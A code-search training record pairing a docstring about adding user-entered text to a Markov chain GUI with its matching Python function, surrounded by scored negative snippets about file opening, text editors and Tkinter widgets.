"def Run():\n file_name = AskForFileName()\n file_content = ReadFileContents(file_name)\n head_list = BuildHeadList(file_content)\n atom_list = BuildAtomList(file_content)\n tail_list = BuildTailList(file_content)\n WriteNewFile(head_list, atom_list, tail_list)",
"def createTXT(self):\n now = dt.datetime.now().strftime(\"%m-%d %H-%M\")\n self.filename = \"bwcca_tags \" + now\n try:\n if \"/\" in self.dir_lbl[\"text\"]:\n desired_list = self.phraseMaker()\n with open(f\"{self.folder}/{self.filename}.txt\", \"w\") as f:\n for i in desired_list:\n f.write(f\"{i}\\n\")\n self.stat_lbl[\"text\"] = f\"/{self.filename} created!\"\n else:\n self.dir_lbl[\"text\"] = \"Select a folder!\"\n self.dir_btn.focus()\n except Exception as e:\n self.dir_lbl[\"text\"] = e",
"def mark(self):\n\n if self.selected_text_file is None:\n return\n # selectedText = self.textBrowser.textCursor().selectedText()\n pos0 = self.ui.textBrowser.textCursor().selectionStart()\n pos1 = self.ui.textBrowser.textCursor().selectionEnd()\n if pos0 == pos1:\n return\n # add new item to case_text list and database and update GUI\n item = {'caseid': self.case['caseid'],\n 'fid': self.selected_text_file[ID],\n 'pos0': pos0, 'pos1': pos1,\n 'owner': self.app.settings['codername'],\n 'date': datetime.datetime.now().astimezone().strftime(\"%Y-%m-%d %H:%M:%S\"),\n 'memo': \"\"}\n self.case_text.append(item)\n self.highlight()\n\n cur = self.app.conn.cursor()\n # Check for an existing duplicated linkage first\n cur.execute(\"select * from case_text where caseid=? and fid=? and pos0<=? and pos1>=?\",\n (item['caseid'], item['fid'], item['pos0'], item['pos1']))\n result = cur.fetchall()\n if len(result) > 0:\n Message(self.app, _(\"Already Linked\"),\n _(\"This segment has already been linked to this case\"), \"warning\").exec()\n return\n cur.execute(\"insert into case_text (caseid,fid, pos0, pos1, owner, date, memo) values(?,?,?,?,?,?,?)\",\n (\n item['caseid'], item['fid'], item['pos0'], item['pos1'], item['owner'], item['date'], item['memo']))\n self.app.conn.commit()\n # File may not be assigned in the table widget as Yes\n self.get_files()\n self.fill_table()\n self.app.delete_backup = False",
"def __init__(self, master):\n self.master = master\n self.master.resizable(False, False)\n self.master.title('Markov Babbler')\n self.markov_chain = mc.MarkovChain()\n\n # Constants\n self.button_height = 2\n self.button_width = 21\n self.button_off_color = 'Light Grey'\n self.button_on_color = 'Dark Grey'\n self.button_column_span = 2\n self.spinbox_length = 3\n self.number_of_sentences = 12\n self.options_column = 11\n self.min_sentence_length = 10\n self.max_sentence_length = 20\n\n # Displays babbler's output\n self.display_frame = tk.Frame(master)\n self.display_frame.grid(row=0, rowspan=12, column=0, columnspan=10)\n\n self.display_scrollbar = tk.Scrollbar(self.display_frame)\n\n self.display = tk.Text(self.display_frame, height=18, width=80, bg='WHITE', borderwidth=3,\n relief=\"groove\", wrap='word')\n self.display.config(yscrollcommand=self.display_scrollbar.set)\n self.display_scrollbar.config(command=self.display.yview)\n self.display.pack(side='left')\n self.display_scrollbar.pack(side='right', fill='y')\n\n # Selects .txt file to add to this window's Markov Chain\n self.select_file = tk.Button(master, text='Add File', height=self.button_height, width=self.button_width,\n bg=self.button_off_color, activebackground=self.button_on_color,\n command=self.find_file)\n self.select_file.grid(row=0, column=self.options_column, columnspan=self.button_column_span)\n\n # Adds user entered text to this Markov Chain\n self.user_string_row = 1\n\n self.user_string_entry = tk.Entry(self.master)\n self.user_string_entry.insert(0, 'Add text here!')\n self.user_string_entry.grid(row=self.user_string_row, column=self.options_column)\n\n self.user_string_button = tk.Button(self.master, text='Enter', bg=self.button_off_color,\n activebackground=self.button_on_color, command=self.add_user_text)\n self.user_string_button.grid(row=self.user_string_row, column=self.options_column+1)\n\n # Changes the Markov Chains's order\n self.order_row = 2\n self.order_selection_label = tk.Label(master, text='Markov Chain Order')\n self.order_selection_label.grid(row=self.order_row, column=self.options_column)\n\n self.initial_order_value = tk.StringVar(master)\n self.initial_order_value.set(str(self.markov_chain.order))\n\n self.order_selection = tk.Spinbox(master, values=tuple(range(1, 11)),\n width=self.spinbox_length,\n command=self.recompute_markov_chain)\n self.order_selection.config(textvariable=self.initial_order_value)\n self.order_selection.grid(row=self.order_row, column=self.options_column + 1)\n\n # Select the number sentences for the Markov Chain to output\n self.num_sentences_row = 3\n self.num_sentences_label = tk.Label(master, text='Number of Sentences')\n self.num_sentences_label.grid(row=self.num_sentences_row, column=self.options_column)\n\n self.initial_num_sentences = tk.StringVar(master)\n self.initial_num_sentences.set(str(self.number_of_sentences))\n\n self.num_sentences = tk.Spinbox(master, values=tuple(range(1, 51)),\n width=self.spinbox_length,\n command=self.set_number_of_sentences)\n self.num_sentences.config(textvariable=self.initial_num_sentences)\n self.num_sentences.grid(row=self.num_sentences_row, column=self.options_column + 1)\n\n # Set minimum sentence length for each of the Markov Chain's sentence outputs\n self.min_sentence_row = 4\n\n self.min_sentence_label = tk.Label(master, text='Min Sentence Length')\n self.min_sentence_label.grid(row=self.min_sentence_row, column=self.options_column)\n\n self.initial_min_sentence = tk.StringVar(master)\n self.initial_min_sentence.set(str(self.min_sentence_length))\n\n self.set_min_sentence = tk.Spinbox(master, values=tuple(range(1, 100)),\n width=self.spinbox_length,\n command=self.set_min_sentence_length)\n self.set_min_sentence.config(textvariable=self.initial_min_sentence)\n self.set_min_sentence.grid(row=self.min_sentence_row, column=self.options_column+1)\n\n # Set maximum sentence length for each of the Markov Chain's sentence outputs\n self.max_sentence_row = 5\n\n self.max_sentence_label = tk.Label(master, text='Max Sentence Length')\n self.max_sentence_label.grid(row=self.max_sentence_row, column=self.options_column)\n\n self.initial_max_sentence = tk.StringVar(master)\n self.initial_max_sentence.set(str(self.max_sentence_length))\n\n self.set_max_sentence = tk.Spinbox(master, values=tuple(range(2, 101)),\n width=self.spinbox_length,\n command=self.set_max_sentence_length)\n self.set_max_sentence.config(textvariable=self.initial_max_sentence)\n self.set_max_sentence.grid(row=self.max_sentence_row, column=self.options_column+1)\n\n # Radio buttons controlling if this GUI's Markov Chain should work with words or individual chars.\n self.words_or_char_row = 6\n self.master_variable = tk.StringVar()\n self.words_radio_button = tk.Radiobutton(master, text='Words', variable=self.master_variable, value='a',\n command=self.set_markov_chain_to_words)\n self.chars_radio_button = tk.Radiobutton(master, text='Chars', variable=self.master_variable, value='b',\n command=self.set_markov_chain_to_chars)\n self.words_radio_button.select()\n self.words_radio_button.grid(row=self.words_or_char_row, column=self.options_column)\n self.chars_radio_button.grid(row=self.words_or_char_row, column=self.options_column+1)\n\n # Generates a new batch of output from the Markov Chain, based off current constants like order, min/max\n # sentence length, etc.\n self.generate = tk.Button(master, text=\"Generate Text\", height=self.button_height, width=self.button_width,\n bg=self.button_off_color, activebackground=self.button_on_color,\n command=self.generate_babble_text)\n self.generate.grid(row=7, column=self.options_column, columnspan=self.button_column_span)\n\n # Saves the Markov Chain output last outputted to .txt file\n self.save_file = tk.Button(master, text='Save Text', height=self.button_height, width=self.button_width,\n bg=self.button_off_color, activebackground=self.button_on_color,\n command=self.save_babble)\n self.save_file.grid(row=8, column=self.options_column, columnspan=self.button_column_span)",
"def open_file():\n filepath = askopenfilename(\n filetypes=[(\"Text Files\", \"*.txt\"), (\"All Files\", \"*.*\")]\n )\n if not filepath:\n return\n txt_edit.delete(1.0, tk.END)\n with open(filepath, \"r\") as input_file:\n text = input_file.read()\n txt_edit.insert(tk.END, text)\n window.title(f\"Simple Text Editor - {filepath}\")",
"def cmd_wq(self):\n out_file = open(\"DoubleLinkedList.txt\", \"w\")\n out_file.write(str(self.get_text()))\n out_file.close()\n print(\"File saved to DoubleLinkedList.txt\")",
"def add_file(self, filename):\n f = open(filename, 'r', encoding='utf8', errors='ignore')\n text = f.read()\n f.close()\n self.add_string(text)",
"def load_from_file(self, file_path):\n for line in open(file_path, 'r'):\n term = line.rstrip('\\n')\n self.add(term)",
"def add_file(self, filename):\r\n f = open(filename, 'r', encoding='utf8', errors='ignore')\r\n text = f.read()\r\n self.add_string(text)\r\n f.close()",
"def file_open(self):\n filename, _ = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File')\n\n with open(filename, 'r', encoding=\"utf8\") as file:\n self.file_cont = file.readlines()\n self.textToAnalize.setText(''.join(self.file_cont))",
"def main():\n\n args = get_args()\n text = args.text\n mutations = args.mutations\n random.seed(args.seed)\n alpha = ''.join(sorted(string.ascii_letters + string.punctuation))\n\n new_text_line = []\n if os.path.isfile(text):\n print('You said: ', end='')\n for line in open(text, 'rt'):\n new_text_line = list(line.rstrip())\n print(f'\"{line.rstrip()}\"')\n len_text = len(line.rstrip())\n num_mutations = round(len_text * mutations)\n for i in random.sample(range(len_text), num_mutations):\n # print(f'i = {i}, char = {line[i]}, index = {alpha.find(line[i])}')\n # list.index 함수로 색인 위치 찾으면 없을때 error 발생. 있는지 확인하고 쓰던가 아니면 find 함수 쓸 것!!\n # find 반환값 : 색인 위치. 찾을 수 없는 경우 -1 반환\n new_text_line[i] = random.choice(alpha.replace(line[i], '')) # replace 함수는 line[i] 에 해당하는 문자가 alpha에 '있으면' 해당 문자를 치환한다. 없어도 error 안 남.\n print(f'I heard : \"' + ''.join(new_text_line)+ '\"')\n else:\n print(f'You said: \"{text}\"')\n new_text_line = list(text)\n len_text = len(text)\n num_mutations = round(len_text * mutations)\n for i in random.sample(range(len_text), num_mutations):\n new_text_line[i] = random.choice(alpha.replace(text[i], ''))\n print(f'I heard : \"' + ''.join(new_text_line)+ '\"')",
"def saveTexts(self):\n if self.currentItem is not None:\n # Get name of selected file in the List\n currentItempath = path.join(self.workDir, self.currentItem)\n # Pure-text annotation\n filepath_cor = currentItempath + TEXT_ANNO_EXT\n cor_text = self.TextCorr.GetValue().strip()\n self.editFile(filepath_cor, cor_text, self.PlayList.setTextAnno)\n # XML annotation\n filepath_xcor = currentItempath + XML_ANNO_EXT\n xcor_text = self.XMLCorr.GetValue().strip()\n self.editFile(filepath_xcor, xcor_text, self.PlayList.setXMLAnno)\n # Command annotation\n filepath_cmd = currentItempath + CMD_ANNO_EXT\n cmd_text = self.CorrCommand.GetValue().strip()\n self.editFile(filepath_cmd, cmd_text, self.PlayList.setCommandAnno)\n # Annotator comments\n filepath_nfo = currentItempath + COMMENT_EXT\n nfo_text = self.Comments.GetValue().strip()\n self.editFile(filepath_nfo, nfo_text, None)",
"def browse_files_in(self,*args):\n path_to_data = tkFileDialog.askopenfilename()\n #show chosen value in textframe\n self.docstring.delete(0,tk.END)\n self.docstring.insert(0,path_to_data)\n #use chosen value as self.data_file\n self.data_file.set(path_to_data)",
"def main():\n # call open_file() to get file pointer \n fd = open_file()\n # call fill completion to get dict, then close the openned file\n full_set = create_dict(fd)\n wrds = find_words(full_set)\n print(wrds)\n fd.close()\n # ask for a prefix in while loop",
"def add_file(self, filename):\n f = open(filename, 'r', encoding='utf8', errors='ignore')\n text = f.read()\n f.close()\n \n self.add_string(text)",
"def browse_files_out(self,*args):\n path_to_data = tkFileDialog.askopenfilename()\n #show chosen value in textframe\n self.docstring_offers.delete(0,tk.END)\n self.docstring_offers.insert(0,path_to_data)\n #use chosen value as self.exchanged_offers_filepa\n self.exchanged_offers_filepath.set(path_to_data)",
"def add_user_text(self):\n text_to_add = self.user_string_entry.get()\n self.user_string_entry.delete(0, tk.END)\n self.markov_chain.add_string(text_to_add)",
"def addContent(text):",
"def main():\n filepath = input(\"Enter the Source File: \")\n with open(filepath, encoding=\"utf-8\") as f:\n sentences = f.readlines()\n sentences = \" \".join(sentences)\n\n summary = summarize_sentences(sentences)\n\n filepath_index = filepath.find(\".txt\")\n outputpath = filepath[:filepath_index] + \"_lexRank.txt\"\n\n with open(outputpath, \"w\") as w:\n for sentence in summary:\n w.write(str(sentence) + \"\\n\")",
"def open_file(event):\r\n\r\n filepath = askopenfilename(\r\n\r\n filetypes=[(\"Text Files\", \"*.txt\"), (\"All Files\", \"*.*\")]\r\n\r\n )\r\n\r\n if not filepath:\r\n\r\n return\r\n\r\n # Si se abre un archivo esta línea borra todo el contenido de el text Area\r\n txt_Area.delete(\"1.0\", tk.END)\r\n\r\n # Se abre el archivo\r\n with open(filepath, \"r\") as input_file:\r\n\r\n # Se lee el archivo\r\n text = input_file.read()\r\n\r\n # Se inserta el archivo\r\n txt_Area.insert(tk.END, text)\r\n\r\n window.title(f\"Simple Text Editor - {filepath}\")",
"def main():\n grid = make_grid(3, 3) # change to 3x3\n dictionary = get_dictionary(\"words.txt\")\n words = search(grid, dictionary)\n display_words(words)",
"def file_update(self, data):\n file = open(\"../util/LinkedList_File\", \"r+\")\n file.truncate(0)\n file.close()\n if self.search_item(data) == True:\n self.remove(data)\n file = open(\"../util/LinkedList_File\", \"a+\")\n\n orderedlist_content = []\n orderedlist_content = self.display_content()\n\n for i in orderedlist_content:\n file.write(i + \" \", )\n file.close()\n file = open(\"../util/LinkedList_File\", \"r\")\n for i in file:\n print(i)\n file.close()\n else:\n self.add(data)\n\n file = open(\"../util/LinkedList_File\", \"a+\")\n\n orderedlist_content = []\n orderedlist_content = self.display_content()\n\n for i in orderedlist_content:\n file.write(i + \" \")\n file.close()\n\n file = open(\"../util/LinkedList_File\", \"r\")\n for i in file:\n print(i)\n file.close()",
"def test_add_word_in_file(self):\n pass",
"def load(self, file_name):\n try:\n [self.add_word(w) for w in open(file_name).read().splitlines()]\n except IOError as e:\n print(e)",
"def loadCodeFromFile():\n global notes_text\n\n notes_text.delete(\"1.0\", END)\n load_interface = Tk()\n load_interface.filename = filedialog.askopenfilename( initialdir = (\"../Templates\") ,title = \"Select file\",filetypes = ((\"Bit Tune File\",\"*.btu\"),(\"All Files\",\"*.*\")))\n load_interface.destroy()\n\n with open (load_interface.filename, 'r') as f:\n code = f.read()\n notes_text.insert(END, str(code))",
"def test_function():\n\n print(\"\\n\") #because looks matter\n with open(\"word3.txt\", \"r\", encoding=\"utf-8\") as svenskfil:\n kattmat = 0\n for rad in svenskfil:\n if kattmat <= 9:\n ordet = rad.strip()\n if ordet in svenska:\n pass\n #print(ordet, end=\" \")\n else:\n svenska.put(ordet)\n print(ordet)\n kattmat += 1\n print(\"\\n\")\n #svenska.write_inorder()\n nod = ''\n startord = input('Välj startord: ')\n makechildren(startord)\n #slutord = input('Välj slutord: ')\n #q.enqueue(startord)",
"def add_task():\n\n yourTask = []\n line = input(\"Add your task: \")\n yourTask.append(line)\n taskfile = open('tasks.txt', 'a')\n for line in yourTask:\n taskfile.write(\"%s\\n\" % line)\n taskfile.close()\n\n import menu"
] |
[
"0.58673614",
"0.58666176",
"0.5830618",
"0.57294697",
"0.57178396",
"0.56749254",
"0.56574875",
"0.5655286",
"0.55703944",
"0.55577236",
"0.55479455",
"0.553887",
"0.55290604",
"0.5523641",
"0.55101806",
"0.5491232",
"0.548524",
"0.54401654",
"0.5432001",
"0.54061073",
"0.5403237",
"0.5383538",
"0.537729",
"0.5336503",
"0.53361726",
"0.53314495",
"0.532804",
"0.5301073",
"0.5275858",
"0.52727306"
] |
0.7365237
|
0
|
Adds any text the user entered into the user_string_entry component to this GUI's Markov Chain.
|
def add_user_text(self):
text_to_add = self.user_string_entry.get()
self.user_string_entry.delete(0, tk.END)
self.markov_chain.add_string(text_to_add)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _settext(self, textEntered):\n if textEntered.strip() == '':\n textEntered=self.data['initialtext']\n self.entry.enterText(textEntered)\n else:\n if callable(self.data['callback']): self.data['callback'](textEntered)\n if self.data['autoexit'] and callable(self.data['exit']):\n # NOTE not safe to call here user callback...\n taskMgr.doMethodLater(.5, self.data['exit'], '_ntryxt')",
"def morphstring_add(self, stringz):\n self.textEdit_morph.setTextColor(QColor(0, 0, 0, 255))\n stringz += f\" kernel: {self.spinBox.value()} shape: {self.comboBox.currentIndex()}\"\n self.textEdit_morph.append(stringz)",
"def displayText(self):\n if self.entryWidget.get().strip() == \"\":\n tkMessageBox.showerror(\"Tkinter Entry Widget\", \"Enter a text value\")\n else:\n self.file_com.write(self.entryWidget.get().strip()+'\\n')",
"def append(self, entry):\n self.strings.append(entry)",
"def update_text(self):\n likes = \"\"\n if self.comedy.get():\n likes += \"You like comedy.\"\n if self.drama.get():\n likes += \"You like drama.\"\n if self.romance.get():\n likes += \"You like romantic.\"\n self.result.delete(0.0, END) # delete from position 0 until the end\n self.result.insert(0.0, likes) # insert to textbox the text in likes in position 0",
"def build_user_input(self):\n pass",
"def add_text(self, text):\n self.text = self.text + text",
"def _enter_text(elem, text, append=False, prepend=False, clear=True):\n pre = app = u''\n\n if prepend:\n pre = elem.value()\n elif append:\n app = elem.value()\n if clear:\n elem.clear()\n elem.send_keys((pre + text + app))",
"def handle_gui_example_three_intent(self, message):\n self.gui['sampleText'] = \"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Egestas sed tempus urna et pharetra pharetra massa massa ultricies. Aliquam sem et tortor consequat id porta nibh. Amet est placerat in egestas erat imperdiet sed. Ut ornare lectus sit amet est placerat in egestas erat. Iaculis eu non diam phasellus vestibulum lorem sed risus ultricies. Hac habitasse platea dictumst vestibulum rhoncus est pellentesque. Vulputate eu scelerisque felis imperdiet proin fermentum. Neque convallis a cras semper auctor neque. Pharetra magna ac placerat vestibulum lectus mauris ultrices eros in. Phasellus faucibus scelerisque eleifend donec pretium vulputate. Malesuada bibendum arcu vitae elementum curabitur vitae nunc. Tellus id interdum velit laoreet id donec. Diam donec adipiscing tristique risus nec. Nisi lacus sed viverra tellus in hac habitasse platea. Amet venenatis urna cursus eget nunc scelerisque viverra mauris in. Sit amet nisl suscipit adipiscing bibendum est ultricies. Nec ultrices dui sapien eget mi proin sed. Egestas dui id ornare arcu odio ut sem nulla. Rhoncus aenean vel elit scelerisque. Neque gravida in fermentum et sollicitudin. Pellentesque massa placerat duis ultricies lacus sed. Nunc id cursus metus aliquam eleifend mi. Eu feugiat pretium nibh ipsum consequat nisl. Aenean euismod elementum nisi quis eleifend quam adipiscing vitae. Est ante in nibh mauris cursus mattis. Sagittis eu volutpat odio facilisis mauris sit amet. At consectetur lorem donec massa sapien faucibus. Odio facilisis mauris sit amet. Quis ipsum suspendisse ultrices gravida dictum fusce. Sagittis nisl rhoncus mattis rhoncus urna neque viverra justo nec. Eget mi proin sed libero enim sed faucibus. Interdum velit euismod in pellentesque massa. Et netus et malesuada fames. Velit aliquet sagittis id consectetur purus. Condimentum lacinia quis vel eros donec ac odio tempor orci. Amet consectetur adipiscing elit pellentesque habitant. Eleifend mi in nulla posuere sollicitudin aliquam ultrices sagittis orci. Nisi porta lorem mollis aliquam ut porttitor leo a diam. Egestas integer eget aliquet nibh praesent tristique. Velit scelerisque in dictum non. Id volutpat lacus laoreet non curabitur gravida arcu ac. Suspendisse interdum consectetur libero id faucibus nisl tincidunt eget. Ipsum a arcu cursus vitae congue mauris. Duis at consectetur lorem donec massa. Orci sagittis eu volutpat odio facilisis mauris. Eget mauris pharetra et ultrices neque ornare. Commodo nulla facilisi nullam vehicula ipsum a. Arcu risus quis varius quam quisque. Gravida in fermentum et sollicitudin. Lacus laoreet non curabitur gravida arcu ac tortor dignissim. Netus et malesuada fames ac turpis. Ipsum dolor sit amet consectetur adipiscing. Tellus elementum sagittis vitae et leo duis ut diam quam. Vitae et leo duis ut diam quam nulla. Risus pretium quam vulputate dignissim. Justo laoreet sit amet cursus sit amet dictum sit. Blandit libero volutpat sed cras. Lacus sed viverra tellus in. Ornare lectus sit amet est placerat in egestas erat. Tortor dignissim convallis aenean et tortor at. Tempus quam pellentesque nec nam aliquam. Nisi scelerisque eu ultrices vitae auctor eu augue ut lectus. Consequat id porta nibh venenatis cras sed felis eget. Massa enim nec dui nunc mattis enim ut. Dignissim enim sit amet venenatis urna. Ac tincidunt vitae semper quis lectus nulla at. Sed felis eget velit aliquet sagittis. Vel turpis nunc eget lorem dolor sed viverra. Non consectetur a erat nam at lectus. Iaculis eu non diam phasellus vestibulum. Dolor sit amet consectetur adipiscing elit ut aliquam purus sit. Libero justo laoreet sit amet cursus sit. Tellus pellentesque eu tincidunt tortor. Maecenas volutpat blandit aliquam etiam erat velit scelerisque in. Semper risus in hendrerit gravida rutrum quisque non tellus orci. Diam in arcu cursus euismod quis viverra nibh cras pulvinar. Habitasse platea dictumst quisque sagittis purus sit amet volutpat consequat. Elit ut aliquam purus sit. Dui faucibus in ornare quam viverra orci sagittis eu. Purus ut faucibus pulvinar elementum integer. Condimentum lacinia quis vel eros donec ac odio tempor. At in tellus integer feugiat scelerisque varius morbi. Augue eget arcu dictum varius duis. Aliquam sem et tortor consequat id. Bibendum arcu vitae elementum curabitur vitae. Massa sed elementum tempus egestas sed sed. Suscipit adipiscing bibendum est ultricies. Etiam tempor orci eu lobortis.\"\n self.gui.show_page(\"paginationExample.qml\")",
"def update_user_word(self, user_in):\n self.user_word += user_in",
"def print_entry(text):\n print \"Text entered: \\n '%s'\" % text",
"def text_entry(self):\n\n allowed_sequences = set(['KEY_ENTER', 'KEY_ESCAPE', 'KEY_DELETE'])\n\n sys.stdout.write('Enter text (<Esc> to abort) : ')\n sys.stdout.flush()\n\n # Track start column to ensure user doesn't backspace too far\n start_column = self.term.get_location()[1]\n cur_column = start_column\n choice = ''\n with self.term.cbreak():\n val = ''\n while val != 'KEY_ENTER' and val != 'KEY_ESCAPE':\n val = self.term.inkey()\n if not val:\n continue\n elif val.is_sequence:\n val = val.name\n if val not in allowed_sequences:\n continue\n\n if val == 'KEY_ENTER':\n break\n elif val == 'KEY_ESCAPE':\n pass\n elif val == 'KEY_DELETE':\n if cur_column > start_column:\n sys.stdout.write(u'\\b \\b')\n cur_column -= 1\n choice = choice[:-1]\n else:\n choice = choice + val\n sys.stdout.write(val)\n cur_column += 1\n sys.stdout.flush()\n\n # Clear to beginning of line\n self.set_input(choice)\n self.set_sound_stage(choice)\n sys.stdout.write(self.term.clear_bol)\n sys.stdout.write(self.term.move(self.term.height, 0))\n sys.stdout.flush()",
"def getInput(self):\n self.userInput = self.entry.get()",
"def UserInput(self, username, userinput):\n pass",
"def ui_input_text() -> str:\n\ttext = input('enter your text ')\n\treturn text",
"def addText(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n pass",
"def add_input(input_string, trie):\n trie.insert(input_string) # add name to Trie",
"def entertext(Title,objectname,stringtoenter):\n try:\n ldtp.enterstring(Title,objectname,stringtoenter)\n logging.DEBUG(\"entered string\")\n except Exception as er:\n logging.DEBUG(\"Not able to enter the string in %\")",
"def push(self, text, calledFromClear = False, label=None, order=None, textinputText=None):\r\n self.phone.comment('%s(%s)' % (calledFromClear and 'clear.sx' or 'input.push', text))\r\n\r\n # if label given as logical text, do translation\r\n if self.phone.isLogicalText(label):\r\n label = self.phone.getTranslation(label)\r\n # if textinputText has been given as logical\r\n elif self.phone.isLogicalText(textinputText):\r\n textinputText = self.phone.getTranslation(textinputText)\r\n\r\n text = scripting.escape(text)\r\n\r\n # if label is given as anchor, find all labels and their parents' childs with type textinput. if label match, use the input\r\n if label != None:\r\n sxString = \\\r\n \"\"\"\r\n (let ((labels (send primary-root-container get-children-by-type \"label\")))\r\n (for-each (lambda(x)\r\n (when (equal? (send x get-text) \"%s\")\r\n (define parent (send x get-parent))\r\n (define textinputs (send parent get-children-by-type \"textinput\"))\r\n (when (pair? textinputs)\r\n (send (car textinputs) set-text \"%s\")\r\n )\r\n )\r\n )\r\n labels\r\n )\r\n )\r\n \"\"\" % (label, text)\r\n\r\n elif textinputText != None:\r\n # textinput text as anchor\r\n sxString = \\\r\n \"\"\"\r\n (let ((textinputs (send primary-root-container get-children-by-type \"textinput\")))\r\n (for-each (lambda(x)\r\n (when (equal? (send x get-text) \"%s\")\r\n (send x set-text \"%s\")\r\n )\r\n )\r\n textinputs\r\n )\r\n )\r\n \"\"\" % (textinputText, text)\r\n elif order != None:\r\n # textinput field's order given\r\n valid = ['car', 'first', 'second', 'third', 'fourth', 'fifth', 'sixth','seventh', 'eighth', 'ninth', 'tenth', 'last']\r\n if not order in valid:\r\n self.phone.fail(\"Input push: Wrong argument for order. Valid ones: %s \" % valid)\r\n\r\n sxString = \\\r\n \"\"\"\r\n (let ((textinputs (send primary-root-container get-children-by-type \"textinput\")))\r\n (when (pair? textinputs)\r\n (send (%s textinputs) set-text \"%s\")\r\n )\r\n )\r\n \"\"\" % (order, text)\r\n else:\r\n # if no label nor textinput text nor order has been given, text will be pushed to focused textinput field\r\n sxString = \\\r\n \"\"\"\r\n (let ((textinputs (send primary-root-container get-children-by-type \"textinput\")))\r\n (for-each (lambda(x)\r\n (when (send x has-focus)\r\n (send x set-text \"%s\")\r\n )\r\n )\r\n textinputs\r\n )\r\n )\r\n \"\"\" % text\r\n\r\n self.phone.uiState.getCurrentState(refresh = True)\r\n\r\n # check that text input field is found\r\n if self.phone.uiState.getCurrentState().find('//textinput'):\r\n sxResp = self.phone.sx(sxString)\r\n\r\n if 'error' in sxResp:\r\n self.phone.fail('%s(%s) failed, SX error (%s)' % \\\r\n (calledFromClear and 'clear.sx' or 'input.push', text, sxResp))\r\n else:\r\n self.phone.fail('%s(%s) failed, text input field not found' % \\\r\n (calledFromClear and 'clear.sx' or 'input.push', text))",
"def __init__(self,name,value,*args,**kargs):\n self._is_string_ = type(value) == str\n self._plain = kargs.get('plain',False)\n self.input = QtGui.QTextEdit()\n InputItem.__init__(self,name,*args,**kargs)\n self.setValue(value)\n self.layout().insertWidget(1,self.input)",
"def on_text_box(self, event):\n text_box_value = self.text_box.GetValue()\n text = \"\".join([_(u\"New text box value: \"), text_box_value])\n if self.state == 0:\n self.canvas_2d.render(text)\n else:\n self.canvas_3d.render()",
"def add_text(self, text: str) -> None:\n self.texts.append(text.strip().rstrip(\"\\n\"))",
"def perform_insert(self, entry, new_text, new_pos):\n entry.handler_block_by_func(self.cb_f1_entry_1_insert_float)\n entry.set_text(new_text)\n entry.handler_unblock_by_func(self.cb_f1_entry_1_insert_float)\n\n GObject.idle_add(entry.set_position, new_pos)\n\n entry.stop_emission(\"insert_text\")\n return",
"def _set_text(self, text):\n self.clear()\n r = self.add_run()\n r.text = _to_unicode(text)",
"def addstr(self,name,string):\n\t\tself.windows[name].addstr(string)",
"def add_text_edit(self, name, value=None, label=None, add_indicator=None, location=(None,0)):\n widget=edit.LVTextEdit(self,value=value)\n widget.setObjectName(_fromUtf8(self.name+\"_\"+name))\n return self.add_simple_widget(name,widget,label=label,add_indicator=add_indicator,location=location)",
"def get_user_text_input(self):\n\t\tuser_input = raw_input('You: ')\n\t\treturn user_input",
"def get_user_input(self, text: str, old_val: str = \"\") -> str:\n x = self.window.width // 2 # center of screen\n y = self.window.height // 2 # center of screen\n input = old_val\n print(end=self.term.home + self.term.clear)\n print(self.term.move_xy(x, y) + self.term.red_bold + text)\n while True:\n print(end=self.term.home + self.term.clear)\n print(\n self.term.move_xy(x - len(input + text) // 2, y)\n + self.term.red_bold\n + text\n + self.term.blue\n + self.term.underline\n + input\n + self.term.normal\n )\n val = self.term.inkey()\n if val.name == \"KEY_ENTER\":\n break\n elif val.name == \"KEY_BACKSPACE\":\n input = input[:-1]\n else:\n input += val\n return input",
"def addText(self, text, textxy, textargs=None):\n if textargs is None:\n textargs = {}\n restore = []\n restore.append({'text': self.attr('text'),\n 'textxy': self.attr('textxy'),\n 'textargs': self.attr('textargs')})\n text, textxy, textargs = self._checkValidTextInput(text, textxy, textargs)\n attrs = {'text': text, 'textxy': textxy, 'textargs': textargs}\n if self.attr('text', None) is None:\n self.update(attrs)\n else: # need to merge existing with new\n self.checkValidText() # makes sure existing info are as lists\n for key in attrs:\n self.update({key: self.attr(key) + attrs[key]})\n self.checkValidText()\n return restore",
"def insert_text(self, text):\n self.str += text"
] |
[
"0.61185825",
"0.5684883",
"0.5672892",
"0.56151104",
"0.5603731",
"0.55997413",
"0.5588983",
"0.5568581",
"0.55082643",
"0.5503857",
"0.54837346",
"0.5478493",
"0.5453264",
"0.5412463",
"0.53762734",
"0.5370564",
"0.5360708",
"0.5335736",
"0.53332293",
"0.53150713",
"0.53012276",
"0.5288266",
"0.526715",
"0.52644527",
"0.52574766",
"0.5250164",
"0.5215102",
"0.5207209",
"0.5191995",
"0.51818204"
] |
0.85894454
|
0
|
Sets the number of sentences to request this GUI's Markov Chain to produce from the current value of the num_sentences SpinBox component.
|
def set_number_of_sentences(self):
self.number_of_sentences = int(self.num_sentences.get())
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def set_sentences(self, sentences):\n self._sentences = sentences",
"def _set_number_of_words(self, N):\n self.N_words_to_display = N",
"def setCount(self, num):\n self.count=num",
"def edit_text(self):\n self.text = self.ui.plainTextEdit.toPlainText()\n sentences_number = count_sentences(self.text)\n self.ui.label.setText(\n f\"{count_sentences(self.text)} sentences in source text\")\n self.ui.spinBox.setMaximum(sentences_number)",
"def setMaxSentenceSize(self, value):\n return self._set(maxSentenceSize=value)",
"def setMinSentenceSize(self, value):\n return self._set(minSentenceSize=value)",
"def set_numpins(self, n):\n self.numpins = n",
"def set_num_jobs(self, num):\n self.num_jobs = num",
"def setNumThreads(self, num):\r\n self.threads = num",
"def set_number_of_samples(self, N):\n\n self.numSamples = N",
"def set_min_sentence_length(self):\n new_min = int(self.set_min_sentence.get())\n cur_max = self.max_sentence_length\n\n if new_min < cur_max:\n self.min_sentence_length = new_min\n else:\n old_min = self.min_sentence_length\n old_min_var = tk.StringVar(self.master)\n old_min_var.set(str(old_min))\n self.set_min_sentence.config(textvariable=old_min_var)",
"def set_num_updates(self, num_updates):\n self.num_updates = num_updates",
"def set_num_updates(self, num_updates):\n self.num_updates = num_updates",
